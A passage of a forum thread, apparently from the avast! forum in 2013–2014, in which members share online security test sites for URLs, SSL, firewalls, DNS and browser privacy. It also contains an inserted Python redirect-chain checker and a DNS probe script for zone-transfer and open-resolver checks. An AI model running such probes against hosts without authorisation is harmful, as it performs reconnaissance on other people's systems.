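    return {
        "type": kind, "final": final, "status": status, "hops": hops,
        # A chain that ends on another host deserves a look (tracking, malvertising)
        "cross_domain": urlsplit(start).hostname != urlsplit(final).hostname,
        # Any https -> http step strips transport protection from the rest of the chain
        "downgrade": any(a.startswith("https://") and b.startswith("http://")
                         for a, b in zip(chain, chain[1:])),
    }


def follow_redirects(url, fetch=fake_fetch, max_hops=10):
    """Walk the chain from url; hops is a list of (from, status, to) tuples."""
    hops, seen, current = [], set(), url
    while True:
        if current in seen:  # the 300-points-at-itself case from the post
            return _summary(url, hops, current, None, "redirect loop")
        seen.add(current)
        status, location = fetch(current)
        if 300 <= status < 400 and location:
            target = urljoin(current, location)  # Location may be relative
            hops.append((current, status, target))
            if len(hops) > max_hops:
                return _summary(url, hops, target, status, "too many redirects")
            current = target
            continue
        kind = "direct link" if not hops else "redirect"
        return _summary(url, hops, current, status, kind)


if __name__ == "__main__":
    for start in FAKE_RESPONSES:
        print(start, "->", follow_redirects(start))
```

To run it against a real URL, pass `fetch=live_fetch`; the offline table is what the tests below exercise.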
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2013, 12:29:34 PM
Do we need a hosting web reputation system?

There are various parties involved  to work towards a more secure Internet.
It is not only the (avast!) user with his, her or its webclient that has to have security at mind and work towards a more secure Internet.
It is also the website owner, webmaster and the website software coder that has to be (more) security aware.
In the virus and worms we cover all these aspects.

But it also goes higher up.
I see loads of website scanners and security analyzers exist. But what about the web hosters?
Shouldn't we put them under some form of scrutiny also?

There certainly is abusive and malicious website and IP hosting, where (criminal) money interests come first and security last.
Sitevet is a scanner to give an idea about the Autonomous System health,
also on Clean MX we can get these details and there are other (re)sources.

In a time where we see it has now more or less been confirmed (by Mrs. Feinstein's utterances)
that grand-scale telco surveillance "snarfing" is being performed and the integrity of the Interwebs is at stake,
it is of the utmost importance to give security a higher priority than it had previously and than it has now.

When even the European AMS-IX is gonna have a US base now, as has been decided by votes, we know this is not idle talk.
Government and other commercial snarfing will go on and will only be limited by what they see as technically impossible.
If hosters and telcos do not work towards more secure infrastructures the situation will only get worse or stay like it is.
Therefore we not only need a website rep system but also a hosting rep system.
Google Safebrowsing is giving such details,
but I have a hunch general users and website owners/webmasters aren't at all that aware.
I hope I am wrong here!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 03, 2013, 11:57:26 AM
Saw a double.click generated ad on a Romanian scan site
Analyzed it here: http://www.urlanalyser.net/www.mapazdrowia.pl  (adsite Romanian of course)
Analyzer is interesting while it will give resolved mistypes going there.
Analyzing adsite domains with this might be rewarding: http://www.urlanalyser.net/www.mapazdrowia.pl
Normally I do not see these ads because I neatly have them blocked, but interesting to see what doubleclick (google ads) serves up once in a while,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 06, 2013, 04:51:43 PM
To clarify specific security problems for a given site some SEO scanners certainly assist us (for social sites etc.)
For instance an online Meta Tag analyzer (when not checked for input/output validation, embedded, should be checked with regular expressions)
we find it here: http://www.submitexpress.com/analyzer/
http://analyzer.metatags.org/  and tools here: http://seotools.scrubtheweb.com/
Read on malicious meta tag: http://blog.unmaskparasites.com/2009/07/23/goscanpark-13-facts-about-malicious-server-wide-meta-redirects/
link article author = Denis Sinegubko
These were also found to be helpful: http://www.internetofficer.com/seo-tool/redirect-check/  (watch out for malicious redirects)
Read instruction s here: http://www.stopthehacker.com/2012/11/05/how-to-discover-and-remove-malicious-redirects-in-the-htaccess-file/

http://www.seoimage.com/seo-tools/check-server-headers.php (for this I use HTTP Spy extension in Google Chrome)
combine this with a scan via urlquery dot net...see an example here: http://urlquery.net/report.php?id=6317707
go down the report page to http transactions

Enjoy and put these to good use, my friends,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 09, 2013, 11:35:13 PM
See the malicious DNS world activity. This is growing to be a real malware threat, my good forum friends, see: http://exposure.iseclab.org/
Click the drop down menu on search and search for domains and IPs into this.
Exposure is also part of this metascanner: http://www.urlvoid.com/scan

Enjoy this scan, all you folks that are into pre-scanning links,
and also try this metascanner, a real good one, as I may say so:
http://scanurl.net/?u= 
This is a nice multiscanner to check out suspicious URLs and URIs,

Stay safe through avast! and keep the avast! Shields up,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 11, 2013, 12:10:27 AM
Another nice link checker also with advice on broken links etc:
An example http://www.ranks.nl/cgi-bin/ranksnl/tools/checklink.cgi?uri=www.otrforum.com
and an additional one here: http://www.brokenlinkcheck.com/broken-links.php#status
It also alerts on (conditional) redirects; the next step is to enter the redirect URI.

Enjoy whenever in need of checking...

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 11, 2013, 12:16:41 PM
Price of exploit kits went up by 2200% for non-Russians after the exit of the Blackhole vendor ->: http://malware.dontneedcoffee.com/2013/10/paunch-arrestationthe-end-of-era.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2013, 03:47:53 PM
Again I stumbled upon an awesome test site...
Go here: http://check-host.net/check-dns?host=
For instance see DNS check for the forum: http://check-host.net/check-dns?host=forum.avast.com
What about the different result from the Vienna and Ukraine servers?
Another one: http://www.watchmouse.com/en/checkit.php
http://www.watchmouse.com/en/dnstool.php?vhost=_&vtt=1382018577&varghost=http%3A%2F%2Fforum.avast.com&vaction=trace&trace=analyse
and this: http://www.dnssy.com/report.php?q=

Enjoy, my good forum friends,

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2013, 11:38:36 PM
Nice Sucuri URL Mapping and cross domains links online tool.
Example for our forum: http://urlfind.org/?site=http%3A%2F%2Fforum.avast.com%2Findex.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 18, 2013, 12:05:59 AM
Viewed the avast forum source code through this: http://validator.w3.org/check?charset=iso-8859-1&fbc=1&doctype=HTML+4.01+Transitional&fbd=1&group=1&uri=http%3A%2F%2Fforum.avast.com%2Findex.php
Quote
Validation Output: 2 Errors

   1. Error required attribute X not specified

      ✉

      The attribute given above is required for an element that you've used, but you have omitted it. For instance, in most HTML and XHTML document types the "type" attribute is required on the "script" element and the "alt" attribute is required for the "img" element.

      Typical values for type are type="text/css" for <style> and type="text/javascript" for <script>.
          * Line 662, column 193: required attribute "alt" not specified

            …/Themes/default/images/icon_twitter.png" class="icon" />avast! on Twitter</a> |

          * Line 663, column 218: required attribute "alt" not specified

            …Themes/default/images/icon_facebook.png" class="icon" />avast! on Facebook</a>

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 29, 2013, 12:16:46 AM
Get the SSL Encryption report for your browser: https://www.fortify.net/sslcheck.html (the calomel certification check for fortify is moderate)
Try this one for a server: http://www.sslshopper.com/ssl-checker.html#hostname=https://forum.avast.com/index.php?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 19, 2013, 07:17:04 PM
Test your site for speed, example http://scanftree.in/speed/www.plancorp.com
Our forums results: http://scanftree.in/speed/forum.avast.com/

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on November 21, 2013, 07:38:57 PM
Test your internet connection against being part of a botnet, do the first step: https://www.check-and-secure.com/ipcheck/_nl/solution/clean.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 22, 2013, 06:08:46 PM
Did you pass this entrance exam? http://searchsecurity.techtarget.com/feature/Entrance-exam-Web-attack-prevention-and-defense
link author = by Michael Cobb (Security School)
Enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 28, 2013, 06:51:15 PM
Test your DNS server against running open resolvers, 28 million DNS servers are vulnerable.
Check your IP space: http://openresolverproject.org/
For automated access, use e-mail (translated from the site's Japanese note)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 11, 2013, 10:22:59 PM
A check and secure test, do it here ->  http://www.check-and-secure.com/portcheck/_en/index.html

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 12, 2013, 01:16:17 AM
Hi blacklist check: http://whatismyipaddress.com/blacklist-check

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 29, 2013, 12:08:02 AM
Nice project to search on: http://hostcabi.net/

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 01, 2014, 11:34:16 PM
Scan how you are connected out: http://www.ipscanner.nl/wat_is_mijn_ip_adres.html

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on January 02, 2014, 12:05:45 AM
Scan how you are connected out: http://www.ipscanner.nl/wat_is_mijn_ip_adres.html (http://www.ipscanner.nl/wat_is_mijn_ip_adres.html)

pol
The firewall in Windows 8.1 is obviously doing its job. :)
(http://www.screencast-o-matic.com/screenshots/u/Lh/1388617483153-13856.png)
Title: Re: Tests and other Media topics
Post by: polonus on January 03, 2014, 01:12:51 PM
Thank you, bob3160, for testing this. Had similar results  ;D

Damian
Title: Re: Tests and other Media topics
Post by: Para-Noid on January 03, 2014, 11:46:29 PM
A check and secure test, do it here ->  http://www.check-and-secure.com/portcheck/_en/index.html

enjoy,

polonus

I have used the grc.com "shieldsup" test.
Each of them showed no holes.
I use the port stealthing in Comodo Firewall.  8)

Title: Re: Tests and other Media topics
Post by: polonus on January 03, 2014, 11:55:51 PM
Hi Para-Noid,

I could not think of Para-Noid other than being "completely stealth". And so he is.
Thanks for the feedback, my good friend,

pol
Title: Re: Tests and other Media topics
Post by: polonus on January 08, 2014, 11:49:44 PM
My router survived the crash test. Yours also? Time to celebrate or weep... ;D
Take the test: https://www.grc.com/dns/crashtest.htm  (courtesy of GRC- thank you Steve!)

polonus
Title: Re: Tests and other Media topics
Post by: Simion on January 09, 2014, 12:22:51 AM
Mine, too!  ;D
Title: Re: Tests and other Media topics
Post by: marc-d-l on January 09, 2014, 12:58:55 AM
Mine survived yet another test (cheer)
Title: Re: Tests and other Media topics
Post by: polonus on January 13, 2014, 05:58:46 PM
Test that site-uri before you click through to venture out somewhere for the first time.
I won't go places without pre-scanning the URL.

Some URL pre-scanning possibilities are given below.
Go to: http://www.google.com/safebrowsing/diagnostic?site=
example http://www.google.com/safebrowsing/diagnostic?site=http://lfmonline.de/test/test.php
or http://scanurl.net/?u=   (a nice metascanner)
or http://online.us.drweb.com/?url=1
or http://soswebscan.jobandproject.com/beta_scan.php
or http://www.websicherheit.at/en/website-security-check/

Whenever avast! shields block you from going there or Google Safebrowsing or Bitdefender TrafficLight stay away!
When in doubt post in the virus and worms section for a sec op and help from a qualified removal expert.

Do not act like those in the attached picture, play safe, stay secure!

polonus
Title: Re: Tests and other Media topics
Post by: Simion on January 13, 2014, 11:30:49 PM
Hi Damien,

I'm getting a 400 error on the first one.
Title: Re: Tests and other Media topics
Post by: polonus on January 13, 2014, 11:37:59 PM
Well the 400 error won't come when you enter a site name to follow that, like for instance:
-> http://www.google.com/safebrowsing/diagnostic?site=http://en.wikipedia.org/wiki/Kinloch_Rannoch
So you need to add the site to scan to the query!

pol
Title: Re: Tests and other Media topics
Post by: Simion on January 13, 2014, 11:40:48 PM
Doh! I'm an idiot. I was trying to bookmark it. ;D

Thanks
Title: Re: Tests and other Media topics
Post by: !Donovan on January 14, 2014, 02:39:09 AM
Hi,

It is possible to use JavaScript in your bookmark so that clicking the bookmark will show you the Google SafeBrowsing results for the current site you're on.

Cheers,
~!Donovan
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2014, 06:12:14 PM
Test how modern your browser is: http://modernizr.github.io/Modernizr/test/index.html
Here are my results: Tests completed in 758 milliseconds.
836 tests of 836 passed, 0 failed.

OK Google Chrome - very modern!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2014, 06:21:11 PM
Generate some bogus data for the snoopers: http://www.generatedata.com/  (demo)

Enjoy,

polonus


Title: Re: Tests and other Media topics
Post by: marc-d-l on January 31, 2014, 08:19:20 PM
Tests completed in 174 milliseconds.
823 tests of 823 passed, 0 failed.

Firefox 26.0
Title: Re: Tests and other Media topics
Post by: DavidR on January 31, 2014, 09:18:28 PM
Tests completed in 174 milliseconds.
823 tests of 823 passed, 0 failed.

Firefox 26.0

He He, I always fail these because they can't run (JavaScript blocked), NoScript and RequestPolicy add-ons.
Title: Re: Tests and other Media topics
Post by: polonus on January 31, 2014, 11:23:54 PM
Hi DavidR,

That is what we call a very secure "fail",  ;D

pol

Title: Re: Tests and other Media topics
Post by: polonus on February 07, 2014, 11:57:22 PM
Remote Access Test, so test whether your wifi modem is accessible from the Internet: https://www.xs4all.nl/klant/veiligheid/telefoniemisbruik/?port=3000&submitfritz=Test+mijn+Fritzmodem  The custom port for abuse is 443
Mine is not remotely accessible - remote access is off.

polonus

Title: Re: Tests and other Media topics
Post by: polonus on February 08, 2014, 12:19:19 AM
Is this Israeli starter av solution an absolute av-panacea for now and the future?
All malcode is basically re-inventive and evolutionary, so all new malware comes as some "new wine in old skins".
Read on this revolutionary concept here: http://www.cyactive.com/
Re: http://www.timesofisrael.com/hack-this-start-up-claims-it-can-stop-all-viruses-permanently/  article author = David Shamah

pol
Title: Re: Tests and other Media topics
Post by: polonus on February 11, 2014, 03:17:34 PM
Cookies and security report. Do a scan!
Example: http://webcookies.info/cookies/forum.avast.com/1126549/
6 persistent cookies found, no third party domains and that is good!

pol
Title: Re: Tests and other Media topics
Post by: CraigB on February 11, 2014, 03:31:41 PM
Cookies and security report. Do a scan!

6 persistent cookies found, no third party domains and that is good!
Same score for me with 12 avast session cookies :)
Title: Re: Tests and other Media topics
Post by: Para-Noid on February 11, 2014, 04:19:37 PM
Cookies and security report. Do a scan!

6 persistent cookies found, no third party domains and that is good!
Same score for me with 12 avast session cookies :)

+3  8)
Title: Re: Tests and other Media topics
Post by: bob3160 on February 11, 2014, 04:39:29 PM
(http://www.screencast-o-matic.com/screenshots/u/Lh/1392133147521-1743.png)
Title: Re: Tests and other Media topics
Post by: polonus on February 13, 2014, 12:57:52 AM
Right O, bob3160,

Let us now check whether we can reach our IP6 address: http://myip6.com/
Access via CloudFlare Ray ID at https://www.cloudflare.com

polonus

Title: Re: Tests and other Media topics
Post by: bob3160 on February 13, 2014, 02:21:24 AM
Right O, bob3160,

Let us now check whether we can reach our IP6 address: http://myip6.com/ (http://myip6.com/)
Access via CloudFlare Ray ID at https://www.cloudflare.com (https://www.cloudflare.com)

polonus
(http://www.screencast-o-matic.com/screenshots/u/Lh/1392254346435-84175.png)
Apparently the avast! SecureLine does an excellent job since it has me totally where I'm not :)
Title: Re: Tests and other Media topics
Post by: polonus on February 19, 2014, 06:47:31 PM
Hackers and attackers start with reconnaissance test(s).
Do a zone transfer test
Let us see if they could succeed to perform a zone transfer: http://hackertarget.com/zone-transfer/
I have got: no results found  ;D ; (1 server found)
;; global options: +cmd
; Transfer failed.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 19, 2014, 07:42:32 PM
Same results for me. :)
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2014, 11:36:05 PM
Do the test.
What is my referer? here: http://www.whatismyreferer.com/
My outcome: No referer / Hidden    You're one step further on your way to anonymity on the internet!
And test here: http://darklaunch.com/tools/test-referer
Link with rel="noreferrer" -> no referrer was sent!
Link -> no referrer was sent!
Form via POST and GET was sent.
Also configure per site with RefControl see: http://www.stardrifter.org/refcontrol/

Here they also say I have no referer (header response) http://www.zeigen.com/refer/

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 22, 2014, 11:45:48 PM
About the security implications of the above tests: https://isc.sans.edu/forums/diary/When+does+your+browser+send+a+Referer+header+or+not+/16433
link article author Johannes B. Ullrich, Ph. D.
Mind you that firefox has a different referer policy opposed to Google Chrome.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 24, 2014, 03:10:48 PM
Is your server up? Test here:  www.serverstatus.nl/status.php

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 25, 2014, 04:23:35 PM
Test your browser here: https://www.ssllabs.com/ssltest/viewMyClient.html  This is a SSL Client test.

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on February 25, 2014, 04:45:09 PM
Test your browser here: https://www.ssllabs.com/ssltest/viewMyClient.html (https://www.ssllabs.com/ssltest/viewMyClient.html)  This is a SSL Client test.

polonus
"Chrome and Firefox are not vulnerable, even when running on a vulnerable operating system."
Title: Re: Tests and other Media topics
Post by: polonus on March 09, 2014, 02:57:34 AM
Is your firewall working and stealth? Test here: http://www.shieldcheck.com/firewall_test/
Mine is working and stealth is good, all green.
Drag this link to your browser's toolbar to check occasionally: http://www.shieldcheck.com/auto/

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on March 09, 2014, 03:07:45 PM
(http://www.screencast-o-matic.com/screenshots/u/Lh/1394374022194-67515.png)
Nothing special, just the firewall that's part of Windows 8.1 :)
Title: Re: Tests and other Media topics
Post by: polonus on March 11, 2014, 11:20:29 PM
Want to know about the technologies a site was built with, scan here, example: http://builtwith.com/aspentheseries.com
One could sign up for free and see the technological history of a site.
Your HTTP analyzer and debugger could be Fetch: http://fetch.scritch.org/bookmarklet/?u=

enjoy my good forum friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 13, 2014, 04:54:38 PM
Hi a nice link to test how fast a webpage will load (also in Polish): http://test.watchscript.com/?lang=en
Total loading time of this forum site was 11.157 seconds.
Also nice for scanning defaced sites.

Or use Mill Test Reports from here: https://www.websitepulse.com/help/testtools.mtr-test.html
Other free tools there also.

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 02, 2014, 07:28:14 PM
Do a resolver check here: http://www.openresolver.nl/ 
Please enter the resolver IP or hostname.
No reaction from server is green and OK.

pol

P.S. Another one on a slightly different footing:
http://www.thinkbroadband.com/tools/dnscheck.html

D

Title: Re: Tests and other Media topics
Post by: AdrianH on April 02, 2014, 07:42:47 PM
The Anti-Malware Testing Standards Organization (AMTSO TM )

Test your Anti-Malware Settings here..  http://www.amtso.org/

Title: Re: Tests and other Media topics
Post by: polonus on April 02, 2014, 07:51:50 PM
The PUP download is thwarted by my Google Chrome browser.
Avast blocks the access of htxp://www.amtso.org/uploads/cloudcar.exe

So I am good to go,

pol
Title: Re: Tests and other Media topics
Post by: Para-Noid on April 02, 2014, 10:41:47 PM
The Anti-Malware Testing Standards Organization (AMTSO TM )

Test your Anti-Malware Settings here..  http://www.amtso.org/

This test has been around for a while. It was in a post from over a year ago, if I remember right.
But, it's great to see it pop-up every now and then.  8)
Title: Re: Tests and other Media topics
Post by: polonus on April 02, 2014, 10:57:17 PM
Hi Para-Noid,

For some it will be new, so thanks to AdrianH to remind us (again),

polonus
Title: Re: Tests and other Media topics
Post by: Para-Noid on April 02, 2014, 11:26:08 PM
+1  8)

Like I said it's great to see it pop-up now and then. 
It's a fantastic set of tests.  :)
Title: Re: Tests and other Media topics
Post by: polonus on April 12, 2014, 04:40:25 PM
Do this test: https://browsercheck.qualys.com/?scan_type=js
My results were:
Congratulations! You passed Qualys BrowserCheck.
We recommend you scan your browser regularly to stay up to date with the latest versions and plugins.
And yours?

polonus
Title: Re: Tests and other Media topics
Post by: polonus on April 13, 2014, 02:40:19 AM
Check your SSL client, is it OK?
Test here: https://www.howsmyssl.com/

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 13, 2014, 07:13:27 PM
Test SSL domains for Heartbleed: https://www.ssllabs.com/ssltest/

pol
Title: Re: Tests and other Media topics
Post by: polonus on April 19, 2014, 05:57:49 PM
Test whether your router could be turned into a zombie proxy to be used in amplification attacks through this test:
http://www.openresolver.nl/
I get a no reaction, so that is OK.

Or test here: http://openresolver.com/?ip=
You should get Recursive resolver is not detected on (ip address)
IP address (so and so) is not vulnerable to DNS Amplification attacks.

polonus
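The zone transfer test in the 19 February post and the open resolver checks above are both a single raw DNS query and a look at the reply flags. The following is an added example (not code from the posts or from any of the linked sites) that builds those two probes by hand and classifies the answers the way `dig axfr` and the openresolver tools do; the sample replies, zone data and addresses are constructed in-line so it runs offline, and only `probe_resolver` touches the network.

```python
"""Raw DNS probes: AXFR (zone transfer) and open-recursion checks, offline samples."""
import socket
import struct

QTYPE = {"A": 1, "SOA": 6, "AXFR": 252}
RCODE = {0: "NOERROR", 3: "NXDOMAIN", 5: "REFUSED"}

def encode_name(name):
    """Wire-format a domain name as length-prefixed labels plus the root label."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"

def build_query(name, qtype, txid=0x1234, rd=True):
    """Build a query; RD=1 asks the server to recurse, which is the open-resolver probe."""
    flags = 0x0100 if rd else 0
    header = struct.pack(">HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack(">HH", QTYPE[qtype], 1)

def skip_name(msg, off):
    """Return the offset just past a (possibly compressed) name starting at off."""
    while True:
        length = msg[off]
        if length == 0:
            return off + 1
        if length & 0xC0 == 0xC0:          # compression pointer: 2 bytes, ends the name
            return off + 2
        off += 1 + length

def parse_response(msg):
    """Parse header flags and the record types in the answer section."""
    txid, flags, qd, an, _ns, _ar = struct.unpack(">HHHHHH", msg[:12])
    off = 12
    for _ in range(qd):
        off = skip_name(msg, off) + 4      # skip qtype + qclass
    answers = []
    for _ in range(an):
        off = skip_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        answers.append(rtype)
        off += 10 + rdlen
    return {"txid": txid, "rd": bool(flags & 0x0100), "ra": bool(flags & 0x0080),
            "rcode": RCODE.get(flags & 0x000F, str(flags & 0x000F)), "answers": answers}

def classify_axfr(resp):
    """What `dig axfr` would report: a leaked zone starts and ends with the SOA record."""
    a = resp["answers"]
    if resp["rcode"] != "NOERROR" or not a:
        return "Transfer failed."
    if a[0] == QTYPE["SOA"] and a[-1] == QTYPE["SOA"]:
        return "zone transferred: %d records leaked" % len(a)
    return "unexpected answer, inspect manually"

def classify_resolver(resp):
    """An open resolver answers a name it is not authoritative for with RA=1 and real records."""
    if resp["ra"] and resp["rcode"] == "NOERROR" and resp["answers"]:
        return "open resolver"
    return "not an open resolver"

def build_response(query, rcode=0, ra=False, answers=()):
    """Constructed sample reply (no network): QR=1, echo the question, append RRs."""
    txid, qflags = struct.unpack(">HH", query[:4])
    flags = 0x8000 | (qflags & 0x0100) | (0x0080 if ra else 0) | rcode
    header = struct.pack(">HHHHHH", txid, flags, 1, len(answers), 0, 0)
    body = query[12:]
    for rtype, rdata in answers:           # 0xC00C = pointer back to the question name
        body += b"\xc0\x0c" + struct.pack(">HHIH", rtype, 1, 300, len(rdata)) + rdata
    return header + body

def probe_resolver(server, name="www.example.com", timeout=3.0):
    """Live UDP probe of `server` (hypothetical target); the only networked function here."""
    query = build_query(name, "A", rd=True)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(query, (server, 53))
        return classify_resolver(parse_response(sock.recv(4096)))

# Constructed sample zone data (hypothetical, not any real server's answers).
SOA_RDATA = (encode_name("ns1.example.com") + encode_name("hostmaster.example.com")
             + struct.pack(">IIIII", 2014021901, 3600, 600, 86400, 300))
A_RDATA = bytes([192, 0, 2, 1])

def sample_axfr(leaks):
    """Simulated AXFR: a leaking server sends SOA, records, SOA; a closed one REFUSED."""
    query = build_query("example.com", "AXFR", rd=False)
    rrs = [(6, SOA_RDATA), (1, A_RDATA), (6, SOA_RDATA)] if leaks else ()
    reply = build_response(query, rcode=0 if leaks else 5, answers=rrs)
    return classify_axfr(parse_response(reply))

def sample_resolver(is_open):
    """Simulated recursion probe: open resolver sets RA and answers, closed one refuses."""
    query = build_query("www.example.com", "A", rd=True)
    reply = build_response(query, ra=is_open, answers=[(1, A_RDATA)] if is_open else ())
    return classify_resolver(parse_response(reply))
```

A real AXFR goes over TCP with a two-byte length prefix and may span several messages; the classifier above only needs the record types, so feeding it each message in turn works the same way. "Transfer failed." (the result polonus got) is the healthy outcome; a server that answers the AXFR with a SOA-bounded record list hands an attacker the whole zone for reconnaissance.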
Title: Re: Tests and other Media topics
Post by: polonus on April 20, 2014, 04:12:25 PM
Do a SSL configuration test here: https://sslcheck.x509labs.com/nl/sslcheck?host=
First choose your location, then proceed.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 07, 2014, 12:30:00 AM
Check and secure your browser plug-ins: http://www.check-and-secure.com/browsercheck/_en/
I mean just the first informational part,
not the supposed hardening or the proposed non-avast scanners and cleaners mentioned on that page.
This plug-in and find was a surprise to me: http://techdows.com/2012/08/is-it-possible-to-remove-chrome-remote-desktop-viewer-plugin-from-chrome.html

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 09, 2014, 10:53:11 PM
Do the JonDonym full anonymity test: http://ip-check.info/?lang=en

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 09, 2014, 11:36:53 PM
NoScript and Request Policy in Firefox can help get better results.

polonus

P.S. There is another way to go quite quite stealth in firefox with SecretAgent add-on: https://www.dephormation.org.uk/index.php?page=81
What Secret Agent Does... -> https://addons.mozilla.org/en-US/firefox/user/SecretAgent/
With every web request (or page load, or browser session), Secret Agent does the following things;
Compares the web site host to a white list
If the host isn't on the white list,
Request Headers;
Overrides your browser's 'User Agent' with a random alternative selected from a customizable list
Overrides your browser's 'Accept' header with a random alternative selected from a customizable list
Javascript;
Overrides your browser's Javascript navigator.oscpu value using a random alternative selected from a customizable list
Proxy Headers;
Sets an HTTP X-Forwarded-For header with a random IP address
Sets an HTTP Via header with a random IP address
Cache Headers;
Sets a spoof ETag header with a random string of characters
If the optional 'If-Modified-Since' spoofing feature is enabled, overrides incoming 'Last-Modified' headers with a random time offset
If the host is on the white list
Request Headers;
Presents your browser's default 'User Agent' (or overrides with a user configurable value)
Presents your browser's default 'Accept' header (or overrides with a user configurable value)
Javascript;
Presents your browser's default Javascript navigator.oscpu value (or overrides with a user configurable value)
Proxy Headers;
Unaffected
Cache Headers;
Unaffected
N.B.
Mind you to whitelist the pages you want to use, because in stealth mode you are no longer able, for instance, to post in the forums;
in that case disable the add-on or whitelist forum dot avast dot com in the extension.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 12:01:12 AM
I checked with Panopticlick and indeed these results changed per request:
user agent one time like xxxxxx Gecko, next time it was xxxxx Galeon 1.3.21
HTTP accept headers also changed text/etc   and  next time application/application/
No Plug-in details, No time-zone, No Screen Size, No System fonts, just cookies enabled (first domain)
Limited supercookie test failed. Just have to test the webshields with this in action.
I tested it out and yes WebShield is normally detecting in a SecretAgent's Stealth mode enabled browser.
Read a review here: http://www.wilderssecurity.com/threads/firefox-top-security-privacy-extension.329939/page-2
We have to update SecretAgent's user agent list in the PHP script to be current.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 01:23:06 AM
For what it is worth, automatic firewall check: http://www.shieldcheck.com/auto/

For me all green, my firewall is working!

pol
Title: Re: Tests and other Media topics
Post by: TerraX on May 10, 2014, 01:30:39 AM
Hi,

with me everything is green ... i have avast! Firewall. 8) ;)
Thanks for the test page.

TerraX
Title: Re: Tests and other Media topics
Post by: Callender on May 10, 2014, 02:20:09 AM
Another "interesting" Firefox Add On.

User Agent Cleaner.

Warning. Page is in Russian and requires translation: http://fxprivacy.8vs.ru/

Translated: http://translate.google.com/translate?hl=en&sl=ru&tl=en&u=http%3A%2F%2Ffxprivacy.8vs.ru%2F

Note: A better bet is to visit this page using Firefox: https://addons.mozilla.org/en-US/firefox/addon/http-useragent-cleaner/?src=userprofile

Like SecretAgent it increases privacy and will also prevent logins working on most sites. The add on can be disabled with a single click. It's pretty advanced and I haven't really got to grips with it just yet - particularly with enabling or disabling specific settings on a per site basis.

Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 04:12:55 PM
Hi Callender,

Thanks for your contribution to the discussion. Interesting and will give it a look,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 10, 2014, 04:45:07 PM
Do a proxy test: http://www.lagado.com/proxy-test
and a cache test: http://www.lagado.com/tools/cache-test
Also check your accurate time: http://www.lagado.com/tools/time
you can sync with: http://www.worldtimeserver.com/atomic-clock/atomic.exe  (891 KB)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 11, 2014, 05:54:57 PM
Whenever you have installed SecretAgent 1.26 you can re-check the User Agent spoofing here: http://whatsmyuseragent.com/
# You!! Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.13) Gecko/20060417
next Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060206 Songbird/0.1
then Mozilla/5.0 (compatible; Konqueror/3.5; Linux; X11; i686; en_US) KHTML/3.5.3 (like Gecko)
then Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:1.7) Gecko/20070606
etc. etc.
With stealth mode active  I get an error going to
http://browserspy.dk/os.php e.g. Fatal error: Multiple access type modifiers are not allowed in /home2/gemal/public_html/inc/gsite.php on line 1788

This check worked fine: https://browsercheck.qualys.com/  and also this one: http://www.healthstream.com/browsercheck/?bhcp=1
retested in stealth mode. Strange that a pop-up blocker should be disabled: Popup blocking disabled is recommended.

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 12, 2014, 11:27:24 PM
Another Free SSL Web Server Tester: https://www.wormly.com/test_ssl/h/www.security.nl/i/213.156.0.246/p/443
(with an random example search query)
nice to use next to this one for comparison: https://www.ssllabs.com/ssltest/index.html

enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on May 13, 2014, 04:08:23 PM
A commercial site integrity checker:
example: http://www.sitetruth.com/fcgi/ratingdetails.fcgi?url=bufferapp.com&details=true
Scan will produce identifying info data,
also a link going here (example) http://validator.w3.org/check?uri=http%3A%2F%2Fforum.avast.com%2Findex.php%3F

enjoy,

pol
Title: Re: Tests and other Media topics
Post by: polonus on May 15, 2014, 12:01:45 AM
Content Security Policy Test.

Take it here: https://isc.sans.edu/tools/csptest.html?csp=N

test is brought to us by Johannes Ullrich

polonus
